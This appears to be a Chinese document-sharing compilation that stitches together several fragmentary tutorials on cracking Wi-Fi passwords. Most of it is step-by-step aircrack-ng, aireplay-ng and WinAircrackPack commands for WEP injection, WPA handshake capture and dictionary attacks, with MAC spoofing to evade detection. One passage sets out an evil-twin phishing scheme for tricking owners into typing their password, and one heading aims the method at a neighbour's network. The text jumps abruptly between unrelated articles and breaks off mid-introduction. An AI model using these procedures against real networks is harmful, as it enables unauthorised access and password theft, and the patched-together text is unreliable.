Ubuntu下使用aircrack-ng破解无线密码(1144字)
- 格式:doc
- 大小:1.11 MB
- 文档页数:7
本文主要是针对无线网络的密码破解,使用平台linux 2.26.21.5 ,实现环境BACKTRACK 3 FINAL(USB),无线破解工具Aircrack-ng ,官方网站http://www.aircrack-ng .org ,Aircrack-ng系列工具也有windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能弃win 从lin 了,另外win 下扫描到的AP 也比lin 下少了很多。
其实WIN 并不完整的支持TCP/IP 协议族,有些协议win 直接丢弃不用。
网络本来从一开始就是unix 的天下,win 只是在后来加入了网络的功能。
Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:airmon-ng 处理网卡工作模式airodump-ng 抓包aircrack-ng 破解aireplay-ng 发包,干扰另外还要用到以下linux 命令:ifconfig 查看修改网卡状态和参数macchanger 伪造MACiwconfig 主要针对无线网卡的工具(同ifconfig)iwlist 获取无线网络的更详细信息另外还有其他的linux 基本命令,我就不提示了。
具体破解步骤:1. 修改无线网卡状态:先down 掉2. 伪造无线网卡的MAC 地址:安全起见,减少被抓到的可能3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡4. 修改无线网卡状态:up5. 查看网络状态,记录下AP 的MAC 和本机的MAC ,确定攻击目标6. 监听抓包:生成.cap 或.ivs7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8. 破解.cap 或.ivs ,获得WEP 密码,完成破解下面详细介绍一下各个命令的基本用法(参照命令的英文说明)1. ifconfig用来配置网卡,我们这里主要用来禁用和启用网卡:ifconfig ath0 downifconfig ath0 up禁用一下网卡的目的是为了下一步修改MAC 。
伪造无线路由器错误信息来获取无线密码的方法前言:这篇文章出于我前段时间的一个想法,就是通过伪造无线路由器错误信息来欺骗机主,然后取得无线密码。
后来就不断地试验实践,最后成功了,就有了今天的这篇文章,高三比较忙,所以弄了这么久。
当然我不是为了教会大家破解别人的无线网络而写这篇文章,只是为了让大家了解无线网络的安全问题和交流技术,知道这种技术的原理,才能避免被攻击。
为了便于大多数读者理解,我尽量没有使用很多专业词汇,可能不够严谨,望见谅!本文使用了以下这些开源软件,在这里感谢这些软件的开发者:aircrack-ng: /dnsmasq: /dnsmasq/doc: /lighttpd: /php: /overview:首先简略地说说基本的思路,使用airodump-ng查看有那些客户端正在使用无线网络,然后通过aireplay-ng持续攻击某个AP,使该客户端保持可以搜索到自己的AP,但是又连接不上的状态。
这时我们就马上伪造一个SSID和该AP相同不加密的AP,因为普通的用户都是不懂技术的,正在和MM聊得欢,突然就断开了,这该多恼火~这样一般该机主就会下意识地点击连接我们这个伪造的AP,然后轻而易举地连接上了。
这时机主回到QQ,诶~怎么还是连接不上?然后就打开浏览器随便访问一个网络地址测试一下,这时我们就要让他打开事先准备好的网页,说他的AP出错误了云云,然后然他输入无线密码来重启无线路由器排除故障,他一着急,就输入了自己的无线密码啦~这时密码就会被提交到我们电脑上的php,然后php就把这个密码写入某个文件保存起来,哈哈!不费吹灰之力对吧?然后我们就停止对他AP的攻击,神不知鬼不觉地~机主见恢复正常了,就把这小插曲抛诸脑后啦!这里面也有一点社会工程学的意思。
相关的原理和细节我在后面慢慢和大家叙述。
本文以安装了xubuntu12.04.3的笔记本电脑为系统环境,前段时间我安装了xbuntu13.10,结果各种不稳定各种错误,在Hacking的时候居然在service里面找不到Network-manager,导致Hacking的时候网卡被关闭。
【IT168专稿】上期为各位介绍了将自己的网卡重新安装驱动,以便使用无线网络检测及WEP解密工具。
当我们把网卡驱动更新完毕后,我们再来看看如何找出已经禁用了SSID号广播的无线网络以及进行WEP解密工作。
安全危机轻松破解无线网络WEP密码上篇一、使用airodump抓取无线网络数据包并破解SSID名称:不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airodump来监视无线网络中的数据包。
第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。
(点击看大图)第二步:运行airodump.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。
第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的TP-LINK网卡名称已经变为13atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。
我们输入其前面的数字13即可。
(点击看大图)第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。
(点击看大图)第五步:上篇文章中提到了笔者已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。
在这里输入0,这样将检测所有频段的无线数据包。
(点击看大图)小提示:实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号来。
第六步:同样输入一个保存数据包信息的文件,例如笔者输入softer。
这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。
(点击看大图)第七步:是否只收集wep数据信息,我们点N”。
使用Aircrack-ng破解WPA-PSK加密无线网络结合上小节的内容,下面继续是以BackTrack4 R2 Linux为环境,讲述破解WPA-PSK加密无线网络的具体步骤,详细如下。
步骤1:升级Aircrack-ng。
前面在第一章1.3节我们已经讲述了升级Aircrack-ng套装的详细步骤,这里也是一样,若条件允许,应将Aircrack-ng升级到最新的Aircrack-ng 1.1版。
由于前面我已经给出了详细的步骤,这里就不再重复。
除此之外,为了更好地识别出无线网络设备及环境,最好对airodump-ng的OUI库进行升级,先进入到Aircrack-ng的安装目录下,然后输入命令如下:airodump-ng-oui-update回车后,就能看到如下图23所示的开始下载的提示,稍等一会儿,这个时间会比较长,恩,建议预先升级,不要临阵磨枪。
图23步骤2:载入并激活无线网卡至monitor即监听模式。
在进入BackTrack4 R2系统后,载入无线网卡的顺序及命令部分,依次输入下述命令:startx 进入到图形界面ifconfig –a 查看无线网卡状态ifconfig wlan0 up 载入无线网卡驱动airmon-ng start wlan0 激活网卡到monitor模式如下图24所示,我们可以看到无线网卡的芯片及驱动类型,在Chipset芯片类型上标明是 Ralink 2573芯片,默认驱动为rt73usb,显示为“monitor mode enabled on mon0”,即已启动监听模式,监听模式下适配器名称变更为mon0。
图24步骤3:探测无线网络,抓取无线数据包。
在激活无线网卡后,我们就可以开启无线数据包抓包工具了,这里我们使用Aircrack-ng套装里的airodump-ng工具来实现,具体命令如下:airodump-ng -c 6 –w longas mon0参数解释:-c这里我们设置目标AP的工作频道,通过观察,我们要进行攻击测试的无线路由器工作频道为6;-w后跟要保存的文件名,这里w就是“write写”的意思,所以输入自己希望保持的文件名,这里我就写为longas。
关于破解wep密码的教程已经很多,其工作原理是用aircrack-ng工具包通过收集合法客户端上网时产生的大量数据包来进行破解,但是这个破解是建立在目标AP有活动客户端连接的基础上的,如果没有客户端或是客户端没有上网就会无法收集到足够的ivs数据,很多试验失败的原因就是因为这个。
本教程不适合破解WPA-PSK加密方式。
一、试验环境软件:操作系统(OS):BT3,工具:aircrack-ng(BT3自带)硬件:NTT FT-STC-Na/g PCM无线网卡:可外接天线试验AP:BUFFALO WHR-HP-G54,bssid(mac):00:00:00:AB:CD:EF,工作频道6,essid:Bigfoot(请注意大小写), WEP加密。
二、试验方案1. 设置无线网卡MAC地址。
2. 设置网卡为在指定的ap的工作频道的监控模式。
3. 使用airodump-ng来收集需要的IVS数据4. 使用aireplay-ng在试验AP上产生虚假认证(fake authentication)。
5. 使用fragmentation attack来获得PRGA。
6. 使用上一步获得的PRGA用packetforge-ng工具来生成一个arp包。
7. 使用第四步得到的arp来注入攻击8. 使用aircrack-ng破解以上所有使用的命令,都可以在linux环境下使用--help命令或是使用man xx命令获得在线帮助,如aireplay-ng –help, man aireplay-ng,阅读该信息能给你极大的帮助,笔者想说的是学习linux将加快你的破解过程,毕竟大部分hacker tools在linux下有更好的支持。
三:详细步骤1.设置无线网卡mac地址启动BT3, 在图形界面中,打开一个窗口(shell),输入ifconfig -a查看网卡,外置网卡接口名是wifi1,状态是未载入。
因为mac地址比较难记,所以先不要载入,将MAC地址修改成需伪造的任意的MAC地址,方便后面使用。
bt4破解教程来源:未知时间:2010-09-14 18:32BackTrack是目前为止知名度最高,评价最好的关于信息安全的Linux发行版.它是基于Linux平台并集成安全工具而开发成的Linux Live发行版,旨在帮助网络安全人员对网络骇客行为进行评估.不论您是否把它做为常用系统,或是从光盘或移动硬盘启动,它都可以定制各种安全包, 包括内核配置,脚本和补丁, 以用于入侵检测.BackTrack是一套信息安全审计专用的Linux发行版, 不论您是信息安全专家还是新手. 它创造了一条可以方便您从世界上最大的安全工具库寻找和更新安全工具的捷径.我们的用户包括信息安全领域的专业渗透测试人员, 政府雇员, IT人员, 信息安全爱好者以及安全领域的初学者. 来自不同行业, 不同技术水平用户的反馈促使我们开发了这样一个面对多元需求,包括商业和非商业需求的系统.无论您是在渗透无线网络, 服务器, 还是在进行网站安全评估, 或是在学习安全技术, 或是在利用社会工程学获取信息, BackTrack都可以满足您在信息安全方面的需要.BT4全称Back Track four,这是一个linux环境的便携系统,可以放到U盘或者光盘中启动,对本身硬盘没有影响,无需在本地安装是圈内非常著名的黑客攻击平台,是一个封装好的Linux操作系统,内置大量的网络安全检测工具以及黑客破解软件等。
BT3~4因可以方便的破解无线网络而出名,其中内置的spoonwep是一个非常强悍的图形化破解WEP 无线网络密码的工具。
简介Backtrack 是处于世界领先地位的渗透测试和信息安全审计发行版本。
有着上百种预先安装好的工具软件,并确定能够完美运行,Backtrack4 提供了一个强大的渗透测试平台--从Web hack的应用程序到RFID 审查,都可由Backtrack来完成。
内幕BackTrack 的基础BT4 引入了许多显著的变化,基于Ubuntu Intrepid。
anywlan “” 关于 WPA加密安全性的探讨无线路由 WiFi 信号安全性测试请大家一定要用自己的 路由,不要把本文的方法用到破解他人的密码有可能涉及到 违法行为。
今天我就来说下用 spoonwpa 获得握手包后更换 BT3 的字典和 提取.cap握手包再用WinAircrackPack挂字典在WIN系统下破解 首先启动 BT3用 ifconfig–a 命令查看到端口为 wlan0输入 spoonwpa 启动 spoonwpa 工具第一项输入 ifconfig–a 命令查到的端口号 wlan0,后2 项照图选择就可以了。
点 LAUNCH 开始扫描WPA加密的信号正在扫描………………………..WPA的破解必须要有合法的无线客户端才能进行下去,就是选择 LIS 带钩的信号!选中要破解的信号及这个信号下的合法无线客户端点击 LAUNCH 开始获取握手包正在攻击选择的客户端………….出现金色的锁就是得到了握手包有时候客户端和路由的信号弱或者客户端没有活动很难得到握手包!现在我们插入 U盘拷贝出握手包留着以后学习用 WinAircrackPack在 WIN 系统下破解 插入 U盘后并安装 U盘的驱动驱动安装完成点确定就可以在 BT3 下打开 U盘了U盘里的中文文件夹有乱码……………………呵呵!在 usr/local/bin/wifispoonfeeder/spoonwpa/tmp下就可以找到握手包 wscapture01.cap将 wscapture01.cap拷贝到 U盘备用现在我们接着用 BT3 自带的字典破解我们刚才得到的握手包 点击那个金色的锁正在破解中……………………..破解过程中 CPU的占用到了 100%20 分钟过去了……………………..26 分钟过去了…………………………我耐性不好等不下去了,决定点 ABORT 停止用 BT3 自带的字典破解,换上我自己生成的 生日字典按图中的路径找到 wordlist.txt 文件将自己生成的字典文件更名为 wordlist.txt 并替换 BT3 自带的字典从 U盘拷贝 wordlist.txt 到 BT3然后在点击金色的锁继续用自己生成的“生日字典”在 BT3 下破解 WPA的密码很快密码就出来了,果然是个生日密码 呵呵!KEY FOUND! 的后面显示的就是WPA的密码 19760810根据上面的实战大家可以看出 WPA 的加密只要有合理的字典一样可以很快就破掉的, 所以我们只要根据中国人特点生成有针对性的字典就可以了!1、一般有常用的弱密码如1234567890 和常用的英文单词2、生日密码也是大家用的最多的密码3、在就是手机号做密码4、根据当地的座机号的位数和起始数生成电话密码字典给大家介绍几个好用的字典生成工具,可以生成很多种类的字典!下面我以“黑刀超级字典生成器”做个生日字典给大家看看!大家应该看到了吧,生日字典很小但作用却非常大!手机字典和座机字典就要根据自己的实际情况来制作了,我就不在做详细的介绍了!下面在介绍 WinAircrackPack 在 WIN 系统下挂字典的破解 运行 WinAircrack并选择英语无线路由 WiFi 信号安全性测试请大家一定要用自己的 路由测试,不要把本文的方法用到破解他人的密码有可能涉 及到违法行为。
下载以下软件:1、WinAirCrackPack工具包(WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具,主要包括airodump和aircrack等工具。
它可以监视无线网络中传输的数据,收集数据包,并能计算出WEP/WPA密钥。
我们用它来抓包和暴力破解密码)2、Network Stumbler(无线网络信号搜索软件,可以搜索到隐藏了SSID的AP。
用来搜索周围区域内的无线信号)下面进入实战:1、安装好无线网卡的驱动并禁用或者取下机器上的其它的无线网卡。
2、安装Network Stumbler软件,打开Network Stumbler,等几分钟后就可以看见所有的区域中工作中的无线AP,记录下MAC地址,SSID,信道(chan),是否加密(Encryption)[如果未加密就不需要破解了]。
3、下面再解压缩下载下来的WinAirCrackPack工具包。
可以看到如下文件:4、运行里头的airodump.exe,选择相应的网卡,输入对应无线网卡前的序号,例如我的是13。
5、输入o或者a选择网卡芯片类型,根据你的芯片类型选择,如果是使用兼容驱动的话选择a。
再选择搜索频段,输入0是代表所有频段都检测的意思。
接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中。
随便建立一个就好了。
6、only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。
7、如果出现下图的结果,那么说明你的网卡驱动不支持此程序,同时会自动打开浏览器让你选择合适的驱动。
8、在安装好合适的驱动后会出现下图:9、当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了。
10、我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。
首先安装Aircrack-ngwget /aircrack-ng-1.1.tar.gztar -zxvf aircrack-ng-1.1.tar.gzcd aircrack-ng-1.1直接编译会出错:make -C src allmake[1]: 正在进入目录 `/home/wuyongzhouling/aircrack-ng-1.1/src'make -C osdepmake[2]: 正在进入目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'Building for Linuxmake[3]: 正在进入目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o osdep.o osdep.cgcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o network.o network.cgcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o linux.o linux.clinux.c: 在函数‘is_ndiswrapper’中:linux.c:165:17: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘linux_set_rate’中:linux.c:334:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘linux_set_channel’中:linux.c:807:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘linux_set_freq’中:linux.c:896:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘set_monitor’中:linux.c:1022:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘do_linux_open’中:linux.c:1366:12: 错误:变量‘unused_str’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c:1352:15: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘get_battery_state’中:linux.c:1982:35: 错误:变量‘current’被设定但未被使用 [-Werror=unused-but-set-variable]cc1: all warnings being treated as errorsmake[3]: *** [linux.o] 错误 1make[3]:正在离开目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'make[2]: *** [all] 错误 2make[2]:正在离开目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'make[1]: *** [osd] 错误 2make[1]:正在离开目录 `/home/wuyongzhouling/aircrack-ng-1.1/src'make: *** [all] 错误 2解决方式:编辑vicommon.mak,去掉CFLAGS ?= -g -W -Wall -Werror -O3中的“-Werror”选项,也就是:CFLAGS ?= -g -W -Wall -O3。
aircrack-ng详细教程/download.php?id=529&ResourceID=313教程:1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0 (wlan0是无线网卡的端口,可在终端中输入ifconfig 查看)2、查看无线AP在终端中输入:sudo airodump-ng mon0(特别说明:启动监控模式后无线网的端口现在是mon0 !!!)看看有哪些采用wep加密的AP在线,然后按ctrl+c 退出,保留终端3、抓包另开一个终端,输入:sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP'sMAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)4、与AP建立虚拟连接再另开一个终端,输入:sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0(-h后面跟着的My MAC是自己的无线网卡的MAC地址,命令:iwlist wlan0 scanning可查看自己的MAC地址;自己的MAC 地址为ifconfig命令下wlan0对应的mac 地址)5、进行注入成功建立虚拟连接后输入:sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)6、解密收集有15000个以上的DATA之后,另开一个终端,输入:sudo aircrack-ng wep*.cap进行解密(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的)7、收工破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。
Ubuntu下Aircrack-ng工具包的使用2011-11-25 11:24 Jasey_Wang 分享我要评论(0)字号:T | T由于在Windows环境下不能如Linux环境下直接调用无线网卡,所以需要使用其他工具将无线网卡载入,以便攻击工具能够正常使用,在无线攻击套装Aircrack-ng的Windows版本下内置这样的工具,就是Aircrack-ng,下面给大家介绍一下在Ubuntu下Aircrack-ng工具包的使用。
AD:2013云计算架构师峰会超低价抢票中安装:$sudoapt-getinstallaircrack-ngAircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:airmon-ng处理网卡工作模式airodump-ng抓包aircrack-ng破解aireplay-ng发包,干扰1)airmon-ng启动无线网卡进入Monitor模式,useage:airmon-ng<start|stop|check><interface>[channel]<start|stop|check>:启动,停止,检测<interface>:指定无线网卡[channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了2)airodump-ng抓包工具,我最喜欢用的,详细用法如下:usage:airodump-ng<options><interface>[,<interface>,...]Options:–ivs:仅将抓取信息保存为.ivs–write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分–beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的Filteroptions:–encrypt<suite>:使用密码序列过滤AP–netmask<netmask>:使用掩码过滤AP–bssid<bssid>:使用bssid过滤AP-a:过滤无关的客户端–help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文3)aireplay-ng搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.usage:aireplay-ng<options><replayinterface>Filteroptions:-bbssid:AP的MAC-ddmac:目标的MAC-ssmac:来源的MAC-mlen:最小包长度-nlen:最大包长度-D:禁用AP发现功能Replayoptions:-xnbpps:每秒包数量-pfctrl:框架设定(hex)-abssid:设置AP的mac-cdmac:设置目标的MAC-hsmac:设置来源的mac-gvalue:改变环缓存大小(默认8)Fakeauthattackoptions:-eessid:设置目标AP的SSID-onpckts:每秒爆破的包数量(0自动,默认1)-qsec:存活时间秒-yprga:共享可信的key流–help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.4)aircrack-ng破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.usage:aircrack-ng[options]<.cap/.ivsfile(s)>Commonoptions:-a<amode>:暴破(1/WEP,2/WPA-PSK)-e<essid>:选择essid为目标-b<bssid>:选择ap的mac为目标,就是破解识别的关键字-q:使用安静模式,无数出模式-C<macs>:将所有的AP合并为一个虚拟的–help:显示这个帮助就WEP破解说明,步骤:步骤:1.修改无线网卡状态:先down掉2.伪造无线网卡的MAC地址:安全起见,减少被抓到的可能3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡4.修改无线网卡状态:up5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标6.监听抓包:生成.cap或.ivs7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8.破解.cap或.ivs,获得WEP密码,完成破解具体步骤:1、首先确定是否有wlan0的无线网卡端口,ifconfig即可知道。
如何破解Ubuntu密码
要分为几个基本的步骤
其实Linux呢,都是开源的东西,都是免费的,所以用起来不担心别人说你是不是盗版的
接下来让我跟大家一起分享一下Ubuntu破解密码详解
当你安装完毕以后却忘记了密码,是最头疼的事情,恨不得重新安装,其实不用这么麻烦
1,重新启动你的Ubuntu系统,会提示你是否需要进入配置模式请按ESC,一共就3秒的缓冲时间,切忌别忘了按住ESC,
2,你会看到关于Ubuntu的三个选项,记住喽,选择中间的那项然后按E进入配置
3,你又会看到3个选项卡,同样的选择中间的那个按住E进入配置模式,里面会出现single 就是单一用户的意思,然后你在
后面加个1再回车
4,会回到第2条的那三项,下一步就按B直接启动配置模式
5,之后呢,会弹出来一个选项卡,选择root然后回车启动
6,这就进入了配置模式,然后输入passwd username
7,输入两次密码,成功后会提示你successfully
8,reboot
9,OK,再输入你的用户名跟更改后的密码就行了!。
shell 1:—————————————-1.ifconfig -a<wlan0 … xx:xx:xx:xx:xx:xx>[macchanger -m 00:11:22:33:44:55 wlan0<修改自己网卡的MAC 地址。
当对方设置了MAC 地址过滤时或为了方便后面输入>]2.ifconfig -a wlan0 up(5100可能要加载网卡才支持注入?)3.airmon-ng start wlan0 6<monitor mode enabled on mon0>(6是频道)另一说5100要支持注入用airmon-ng start wlan0如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用”wlan0″[aireplay-ng -9 mon0 / aireplay-ng --test mon0<Injection is working/No anwser>(注入攻击成功/不成功)(检测你的网卡是否支持注入)]4.airodump-ng -w pack -c 6 mon0/wlan0(pack是随便起的获取的ivs的保存文件的名字)另一说用airodump-ng –ivs -w pack -c 6 mon0/wlan0shell 2:—————————————-一、有客户端:破解:abcd四种方式a.合法客户端产生大量有效的数据,能直接获得大量cap。
收到10000以上data后,直接转shell 3,破解密码b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)<Read 11542 packets <got 12587 ARP …>,send 71524 packets … 很多类似行> c.合法客户端不在通信,注入模式不成功,用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan06.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0(可能要另开窗)d.有客户端,并且客户端能产生有效arp 数据的另类破解方式输入modprobe –r iwl3945(加载网卡)输入modprobe ipwraw输入airmon-ng start wlan0 6现在,只要一个命令就搞定,输入:输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。
这篇文章是介绍怎么在Windows xp下面使用airrack和注入式攻击来破解WEP准备:一. 首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动。
Commview所支持的网卡/products/commwifi/adapterlist.php1. 如果你的网卡被commview支持的话,那么点下面的地址下载驱动:/bitrix/redirect.php?event1=download&event2=commwifi&event3=&got o=/files/ca5.zip2. 如果不被commview支持的网卡则可以下载widpackets的驱动:/support/downloads/drivers注意:下面的教程是在你正确安装commview的驱动的前提下进行的!二.你需要下载这个.dll文件(只适用于commview的网友):/commview.dll三. 你需要下载aircrack压缩包:/aircrack-ng-1.0-rc1-win.zip四. 解压aircrack压缩包到你的任意硬盘根目录,在这里我是解压到c盘五. 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\六. 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”, 拷贝到(c:\aircrack).当你完成以上准备以后,就可以开始正式的破解了!破解:1:打开一个命令提示符(开始>运行> cmd.exe)2:在命令提示符窗口下面输入:Cd c:\aircrack按下回车3 在命令相同的提示符窗口下面输入:airserv-ng -d commview.dll按下回车你看到的回复应该跟下面一样:Opening card commview.dllSetting chan 1Opening sock port 666Serving commview.dll chan 1 on port 666如果你没有看到上面的结果的话,而是看到下面的结果的话:注意这里可能会有两种情况出现!!!!!:(1)"Opening card commview.dllAdapter not foundget_guid()airserv-ng: wi_open(): No error"这种情况那么你可以试试这个命令:airserv-ng -d "commview.dll|debug"然后你可能会看到下面的结果Opening card commview.dll|debugName: [CommView] ProximORiNOCO 802.11b/g ComboCard Gold 8470get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co mboCard Gold - Paketplaner-MiniportAdapter not foundget_guid()airserv-ng: wi_open(): No error那么你只要输入下面的命令就可以了airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"或者会自动搜寻网卡,然后提示你是不是这个网卡,然你选yes/no,那么你需要选择yes就可以了(2)"Opening card commview.dllF1init_lib()airserv-ng: wi_open(): No error"这种情况的话,那么你应该是由于安装了,windpackets驱动而产生的问题,那么建议你安装commview驱动,如果可能的话.实例:破解AP的ESSID = wifi16破解AP的BSSID = 11:22:33:44:55:66破解AP的CHANNEL=6自己用于监听网卡的MAC = 01:23:45:67:89:011.首先监听APairodump-ng --channel 6 --write Filename 127.0.0.1:6662.建立虚拟连接:aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666如果一切正常的话那么你会得到下面的回复:Sending Authentication RequestAuthentication successfulSending Association RequestAssociation successful如果你得到:AP rejects the source MAC address这说明你AP设置了MAC过滤,那你需要把你的MAC地址改成破解网络允许的地址.如果你持续得到:sending authentication request那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号. 3.利用-5碎片攻击模式进行攻击aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666如果成功将会得到一个xor文件,例如文件为fragment-0124-161129.xor4.利用packetforge-ng构造一个用于注入的arp包packetforge-ng -0 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w myarp5.利用-2的arp注入攻击模式进行注入aireplay-ng -2 -r myarp 127.0.0.1:6666.利用aircrack来破解WP aircrack-ng -n 64 Filename.cap。
文章由情难枕精心整理,希望对大家的学习和工作带来帮助WinAircrackPack 破解你邻居家的无线WIFI密码破解静态WEP KEY全过程发现首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行…踩点‟(数据搜集)。
NetStumbler 下载地址/downloads/通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备,Encryption属性为…已加密‟,根据802.11b所支持的算法标准,该算法确定为WEP。
有一点需要注意:NetStumbler对任何有使用加密算法的STA[802.11无线站点]都会在Encryption 属性上标识为WEP算法,如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。
破解下载Win32版AirCrack程序集---WinAirCrackPack工具包(下载地址:/download/wireless/aircrack/WinAircrackPack.zip)。
解压缩后得到一个大概4MB的目录,其中包括六个EXE文件:aircrack.exe 原WIN32版aircrack程序airdecap.exe WEP/WPA解码程序airodump.exe 数据帧捕捉程序Updater.exe WIN32版aircrack的升级程序WinAircrack.exe WIN32版aircrack图形前端wzcook.exe 本地无线网卡缓存中的WEPKEY记录程序我们本次实验的目的是通过捕捉适当的数据帧进行IV(初始化向量)暴力破解得到WEP KEY,因此只需要使用airodump.exe(捕捉数据帧用)与WinAircrack.exe(破解WEP KEY 用)两个程序就可以了。
首先打开ariodump.exe程序,按照下述操作:首先程序会提示本机目前存在的所有无线网卡接口,并要求你输入需要捕捉数据帧的无线网卡接口编号,在这里我选择使用支持通用驱动的BUFFALO WNIC---编号…26‟;然后程序要求你输入该WNIC的芯片类型,目前大多国际通用芯片都是使用…HermesI/Realtek‟子集的,因此选择…o‟;然后需要输入要捕捉的信号所处的频道,我们需要捕捉的AP所处的频道为…6‟;提示输入捕捉数据帧后存在的文件名及其位置,若不写绝对路径则文件默认存在在winaircrack的安装目录下,以.cap结尾,我在上例中使用的是…last‟;最后winaircrack提示:…是否只写入/记录IV[初始化向量]到cap文件中去?‟,我在这里选择…否/n‟;确定以上步骤后程序开始捕捉数据包。
不用python破解wifi密码的方法【实用版3篇】篇1 目录1.引言:介绍 WiFi 密码破解的重要性2.方法一:使用 Wireshark 工具3.方法二:使用 Aircrack-ng 工具4.方法三:使用 Reaver 工具5.方法四:使用 John the Ripper 工具6.总结:各种方法的优缺点和适用场景篇1正文在当今数字化时代,WiFi 已成为日常生活中不可或缺的一部分。
然而,对于许多用户来说,WiFi 密码的安全性一直是一个令人担忧的问题。
为了保障个人网络安全,了解如何破解 WiFi 密码变得至关重要。
